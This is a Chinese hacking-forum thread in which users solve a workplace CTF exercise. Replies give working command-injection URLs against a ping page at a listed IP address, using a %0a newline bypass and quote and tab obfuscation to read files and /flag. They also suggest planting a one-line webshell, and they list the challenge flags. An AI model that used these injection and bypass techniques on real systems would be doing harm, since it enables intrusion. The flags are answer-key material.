吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 1153|回复: 13
收起左侧

[求助] 来看看单位发布的CTF题目

[复制链接]
975556036 发表于 2024-4-19 20:48
本帖最后由 975556036 于 2024-4-20 23:23 编辑

单位安全部门发布的CTF题目,让大家学习相关视频后出的考题,思路只有一点点,大家一起试试。
原题目已更新,
1.题目描述:命令执行
http://218.94.126.122:35432
尝试扫描发现目录robots.txt,内容有段文字/1af3223f1176293c.php?。
访问后出现ping功能,后面可以追加%a,其他|,||,&,&&,空格,运算符等都不行。
追加后http://218.94.126.122:35432/1af3223f1176293c.php?ip=127.0.0.1%0als,出现如图,后面指点下。
image.png



发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

cattie 发表于 2024-4-19 21:42
本帖最后由 cattie 于 2024-4-20 09:36 编辑

1、
image.png
这个网站过滤一般的通配符("&|;"之类的,用%0a绕过)
http://218.94.126.122:35447/1af3223f1176293c.php?ip=127.0.0.1%0als

目录:
image.png

http://218.94.126.122:35447/1af3223f1176293c.php?ip=127.0.0.1%0aca%27%27t%09*.php

康康你的php文件(果然过滤了)
image.png

shell.php里面有一个这个:
image.png
用post请求注入就可以拿到shell权限了(现在只返回tt了,估计修改了)

2、
image.png

image.png


flag{300FD72D94299CF3B208E3F7B8973F7D}

3、源码就是"www.rar",下载以后那个robots.txt里面的就是flag
image.png

base64解码
flag{9B69EA6B9A4A85A9}

免费评分

参与人数 1吾爱币 +1 热心值 +1 收起 理由
風信子 + 1 + 1 用心讨论,共获提升!

查看全部评分

cattie 发表于 2024-4-20 16:47
本帖最后由 cattie 于 2024-4-21 10:52 编辑
zsm880216 发表于 2024-4-20 13:12
第一题我进去没有shell.php文件了,应该怎么操作呀

题目应该换过了,第一题自己看看吧
还是一样的,不用shell直接访问这个也行。

http://218.94.126.122:35432/1af3223f1176293c.php?ip=127.0.0.1%0aca%27%27t%09/flag
flag{F1B5284149D5D194D4BCD126FEA94684}

 楼主| 975556036 发表于 2024-4-19 20:51
第一题:好像是个ping内容,扫描出现robots.txt,内容有又出现php,http://218.94.126.122:35447/1af3223f1176293c.php,是个ip=,出现ping127.0.0.1,尝试添加各种管道符都不会成功或者无响应。

第二题:完全没有思路

第三题:扫描有个/www.rar。解压出来有个flag,然后就不知道了
 楼主| 975556036 发表于 2024-4-19 22:03

"flag{OUI2OUVBNkI5QTRBODVBOQ==}“
还得再base64解一下
2205 发表于 2024-4-19 23:35
本帖最后由 2205 于 2024-4-19 23:36 编辑


看一下CPU是啥。。价值:8元(包邮)

20240419232543.png
jhonney 发表于 2024-4-20 01:27
第一个题是flag{F1B5284149D5D194D4BCD126FEA94684}
php过滤了很多符号,但shell权限很大,把过滤的部分删除,生成一句马,然后就可以蚁剑。
shaokui123 发表于 2024-4-20 02:32
啥类型单位啊?好奇
d199212 发表于 2024-4-20 08:12
看了第二题,挺有意思的,哈哈
zsm880216 发表于 2024-4-20 13:12
cattie 发表于 2024-4-19 21:42
1、

这个网站过滤一般的通配符("&|;"之类的,用%0a绕过)

第一题我进去没有shell.php文件了,应该怎么操作呀

点评

题目应该换过了,第一题自己看看吧  详情 回复 发表于 2024-4-20 16:47
li083m 发表于 2024-4-20 13:20
flag{F1B5284149D5D194D4BCD126FEA94684}
flag{300FD72D94299CF3B208E3F7B8973F7D}
第三题 ip端口怎么和第一个一样啊,扫了下备份也没东西
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-15 14:00

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表